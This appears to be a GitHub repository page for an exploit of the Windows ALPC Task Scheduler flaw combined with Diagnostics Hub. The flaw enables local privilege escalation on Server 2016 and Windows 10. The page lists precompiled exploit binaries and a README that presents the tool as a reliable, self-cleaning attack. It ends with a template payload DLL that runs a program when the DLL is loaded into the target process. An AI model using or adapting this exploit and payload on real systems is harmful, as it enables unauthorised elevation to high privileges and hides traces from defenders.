Utilizing the ALPC flaw in combination with Diagnostics Hub as found in Server 2016 and Windows 10.
| Name | Latest commit message | Commit time |
| --- | --- | --- |
| ALPC-TaskSched-LPE | Initial Diagnostics Hub for ALPC cause YOLO | Nov 2, 2018 |
| ALPC-TaskSched-LPE.sln | Initial Diagnostics Hub for ALPC cause YOLO | Nov 2, 2018 |
| ALPC_DiagHub.x64.exe | What the fuck just happened | Nov 2, 2018 |
| ALPC_DiagHub.x86.exe | | |
| Image Pasted at 2018-11-2 20-06.png.jpg | screeeens galore | Nov 2, 2018 |
| Image Pasted at 2018-11-2 20-09.png | screeeens galore | Nov 2, 2018 |
| README.md | updates | Nov 2, 2018 |

README.md

About

This project seeks to provide a stable and reliable method for the ALPC exploit originally disclosed by SandboxEscaper.

It attempts to clean up after itself once the DLL has been loaded.

Screenshots: (two images, "Image Pasted at 2018-11-2 20-06.png.jpg" and "Image Pasted at 2018-11-2 20-09.png", not reproduced here)

Example Payload:

```c
#include <windows.h>

// Minimal payload DLL: launches notepad.exe when the DLL is mapped into
// the target process. The other DllMain reasons are left as no-ops.
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        WinExec("C:\\Windows\\System32\\notepad.exe", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        // Note: DllMain is documented to return TRUE on DLL_PROCESS_ATTACH to
        // keep the module loaded; returning 0 (FALSE) makes the loader unload
        // the DLL again, but WinExec has already run by then.
        return 0;
}
```